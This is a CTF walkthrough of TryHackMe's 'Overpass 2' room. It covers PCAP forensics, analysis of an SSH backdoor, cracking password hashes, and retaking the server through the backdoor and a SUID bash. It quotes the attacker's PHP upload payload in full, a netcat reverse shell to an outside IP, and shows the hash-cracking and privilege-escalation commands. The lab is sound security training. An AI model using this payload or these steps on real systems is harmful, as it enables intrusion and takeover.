CTF Writeups
Tryhackme: Overpass 2 Walkthrough
Quick Walkthrough of Tryhackme’s Overpass 2 room. this room is part of the ‘Offensive Pentesting’ path, which I’m doing as part of my OSCP study
Background
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass’ production server?
Note: Although this room is a walk-through, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Linux Fundamentals as a bare minimum.
md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc
Forensics — Analyse the PCAP
What was the URL of the page they used to upload a reverse shell?
When you open the PCAP file, it should be the first http request seen in the capture. you can use follow tcp stream option but it is not necessary for this question:
Answer:
/development
What payload did the attacker use to gain access?
Following the HTTP stream for the entry from the previous question will lead to discovering a mention of a vulnerable upload page, aswell as upload.php :
Following the tcp stream here will lead us to finding our uploaded payload:
Answer:
<?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f”)?>
What password did the Attacker use to escalate privileges ?
If we go back to the PCAP and start having a look through, we should see some suspicious entries (black and red colour) if we follow the tcp stream on one of these entries it should lead us to the commands the attacker ran. These will be in plaintext as if you remember, they used plain netcat in the payload:
How did the attacker establish persistence?
If we check further down the stream from the previous question, we will see various commands the attacker ran on the server, one of them being a git clone of a tool from GitHub:
Using the fasttrack wordlist, how many of the system passwords were crackable?
From here we can copy and paste the hashes from our /etc/shadow file into a text file and crack them from there. I used johntheripper:
john -w=rockyou.txt passwds.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
[REDACTED] (?)
[REDACTED] (?)
[REDACTED] (?)Answer: 4
Research — Analyse the code
Here we will need to analyse the code for the ssh-backdoor tool on github that the attacker had used to gain persistence on the machine:
What’s the default hash for the backdoor?
We can find this being set as a variable in the code of the main golang file:
What’s the hardcoded salt for the backdoor?
We can see here the VerifyPass function takes a salt as a parameter. This should mean that the salt may be hard-coded into the file:
If we check for other occurrences of the function, we should find our answer:
What was the hash that the attacker used? — go back to the PCAP for this!
If we go back to the tcp stream from the attacker’s netcat commands, we should find our answer there. the attacker passes the hash as an argument on the command line when starting the backdoor.
Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
Here we can add the hash and salt from our backdoor to a file in the format hash:salt and use hashcat in sha512 mode to get our password here.
Attack — Get back in!
Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.
The attacker defaced the website. What message did they leave as a heading?
Visit the IP of the server you just spun up to find the answer.
Answer:
H4ck3d by CooctusClan
What’s the user flag?
We can now ssh into the machine using our password on the james account. We will also need to check the tcp stream again to find the port the backdoor is running on(it’s not default one).
root@ip-10-10-96-202:~# ssh james@10.10.36.147 -p 2222
The authenticity of host '[10.10.36.147]:2222 ([10.10.36.147]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.36.147]:2222' (RSA) to the list of known hosts.
james@10.10.36.147's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.james@overpass-production:/home/james/ssh-backdoor$ ls
README.md backdoor.service cooctus.png id_rsa.pub main.go
backdoor build.sh id_rsa index.html setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor user.txt www
james@overpass-production:/home/james$ cat user.txt
What’s the root flag?
From here could enumerate manually or use a tool such as linPEAS to find our way to root. In this case, it’s through a hidden SUID binary in the user’s home directory:
james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 2020 .
drwxr-xr-x 7 root root 4096 Jul 21 2020 ..
lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 2020 .cache
drwx------ 3 james james 4096 Jul 21 2020 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 2020 .local
-rw------- 1 james james 51 Jul 21 2020 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 2020 www
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# cd /root/ot
.suid_bash: cd: /root/ot: No such file or directory
.suid_bash-4.4# cd /root/
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txtWe have now pwned the machine :]
